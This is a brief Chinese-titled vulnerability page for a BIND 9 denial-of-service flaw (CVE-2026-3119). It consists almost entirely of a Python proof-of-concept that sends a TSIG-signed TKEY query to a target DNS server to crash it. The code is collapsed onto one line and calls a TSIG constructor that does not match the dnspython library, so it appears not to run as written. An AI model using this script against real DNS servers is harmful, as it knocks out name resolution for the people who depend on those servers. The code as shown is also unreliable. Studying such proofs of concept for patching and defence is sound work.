CVE-2026-3119 BIND 9拒绝服务漏洞

import dns.message import dns.tsig import dns.query # PoC for CVE-2026-3119: BIND 9 TKEY Crash # Description: This script sends a signed query with a TKEY record. # Note: Requires a valid TSIG key configured on the target server. target = "192.168.1.100" # Target DNS Server IP key_name = "keyname." key_secret = "SecretKeyValue==" # Base64 secret # Create the TSIG credentials keyring = dns.tsig.HMACTSig(keyring={key_name: key_secret}) # Create a query with a TKEY record # TKEY is usually used for key exchange, here we craft a specific query query = dns.message.make_query('example.com', 'TKEY') query.use_tsig(keyring=keyring) try: # Send the query to the target response = dns.query.udp(query, target, timeout=5) print(f"Response received: {response}") except Exception as e: print(f"Error occurred (Server may have crashed): {e}")